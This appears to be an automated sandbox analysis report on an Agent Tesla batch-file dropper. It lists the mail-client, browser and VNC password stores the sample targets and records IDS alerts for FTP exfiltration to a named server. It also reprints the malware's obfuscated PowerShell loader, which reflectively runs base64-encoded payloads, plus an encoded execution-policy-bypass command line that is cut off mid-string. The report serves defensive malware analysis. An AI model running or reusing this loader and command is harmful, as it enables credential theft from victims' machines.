Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: POP3Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Opera Mail
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: opera:
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: PocoMail
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: appdata
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Pocomail\accounts.ini
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Email
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: POPPass
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SMTPPass
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SMTP
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: eM Client
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: eM Client\accounts.dat
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: eM Client
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Accounts
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: "Username":"
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: "Secret":"
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: "ProviderName":"
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: o6806642kbM7c5
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Mailbird
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SenderIdentities
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Accounts
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Mailbird\Store\Store.db
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Server_Host
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Accounts
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Email
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Username
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: EncryptedPassword
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Mailbird
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: RealVNC 4.x
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: RealVNC 3.x
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SOFTWARE\RealVNC\vncserver
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: RealVNC 4.x
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: RealVNC 3.x
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\ORL\WinVNC3
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: TightVNC
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: TightVNC
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: PasswordViewOnly
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: TightVNC ControlPassword
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ControlPassword
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: TigerVNC
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\TigerVNC\Server
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: UltraVNC
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: passwd
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: UltraVNC
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: passwd2
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: UltraVNC
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ProgramFiles
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: passwd
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: UltraVNC
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ProgramFiles
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: passwd2
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: UltraVNC
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ProgramFiles
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: passwd
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: UltraVNC
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ProgramFiles
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: passwd2
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: UltraVNC
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: passwd
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: UltraVNC
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ProgramFiles(x86)

Source: unknown

HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49720 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49722 -> 136.243.131.47:60398
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49721 -> 136.243.131.47:21

Source: global traffic

TCP traffic: 192.168.2.5:49722 -> 136.243.131.47:60398

Source: Joe Sandbox View	IP Address: 136.243.131.47 136.243.131.47
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: unknown

FTP traffic detected: 136.243.131.47:21 -> 192.168.2.5:49721 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 00:29. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 00:29. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 00:29. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 00:29. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ftp.hitplas.ro

Source: powershell.exe, 00000004.00000002.3794927751.0000000008F6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: powershell.exe, 00000004.00000002.3791531798.000000000706E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000004.00000002.3794927751.0000000008DD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.hitplas.ro
Source: powershell.exe, 00000004.00000002.3788613694.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.3787478566.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3791531798.000000000706E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.3787478566.0000000004B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.3787478566.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3791531798.000000000706E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.3787478566.0000000004B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000004.00000002.3794927751.0000000008E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3787478566.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3794927751.0000000008F57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: powershell.exe, 00000004.00000002.3787478566.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3794927751.0000000008F57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: powershell.exe, 00000004.00000002.3794927751.0000000008F57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/x
Source: powershell.exe, 00000004.00000002.3788613694.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.3788613694.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.3788613694.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.3787478566.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3791531798.000000000706E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.3788613694.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443

Source: unknown

HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49720 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07220FA0	4_2_07220FA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_09E009C8	4_2_09E009C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_09E01288	4_2_09E01288
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_09E00238	4_2_09E00238
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_09E064C1	4_2_09E064C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_09E07498	4_2_09E07498
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_09E0E620	4_2_09E0E620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_09E5E2F8	4_2_09E5E2F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_09E5CA90	4_2_09E5CA90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_09E50040	4_2_09E50040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_09E52C8C	4_2_09E52C8C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_09E546C8	4_2_09E546C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07220F81	4_2_07220F81
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0722298C	4_2_0722298C

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7332
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7332			Jump to behavior

Source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 4.2.powershell.exe.5f93858.2.raw.unpack, ibpaxdfrhq.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 4.2.powershell.exe.82c0000.7.raw.unpack, ibpaxdfrhq.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.82c0000.7.raw.unpack, ibpaxdfrhq.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.powershell.exe.5f93858.2.raw.unpack, ibpaxdfrhq.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.5f93858.2.raw.unpack, ibpaxdfrhq.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.powershell.exe.5f6b838.3.raw.unpack, ibpaxdfrhq.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.5f6b838.3.raw.unpack, ibpaxdfrhq.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.powershell.exe.5fca298.6.raw.unpack, ibpaxdfrhq.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.5fca298.6.raw.unpack, ibpaxdfrhq.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winBAT@7/9@2/2

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\dwm.bat

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8544:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmcjcy2t.5cx.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat" "

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$impmx.CopyTo($wcpem);$impmx.Dispose();$iditr.Dispose();$wcpem.Dispose();$wcpem.ToArray();}function cojht($param_var,$param2_var){$bmqix=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);$asawf=$bmqix.EntryPoint;$asawf.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $qcgkm;$zjhkb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qcgkm).Split([Environment]::NewLine);foreach ($ypota in $zjhkb) {if ($ypota.StartsWith(':: ')){$rlowp=$ypota.Substring(3);break;}}$poyjn=[string[]]$rlowp.Split('\');$cjyyk=uxwbr (jyvtg ([Convert]::FromBase64String($poyjn[0])));$rxcxl=uxwbr (jyvtg ([Convert]::FromBase64String($poyjn[1])));cojht $cjyyk $null;cojht $rxcxl (,[string[]] ('%*'));@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recycleb

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: powershell.exe, 00000004.00000002.3794927751.0000000008FA0000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat

Virustotal: Detection: 8%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc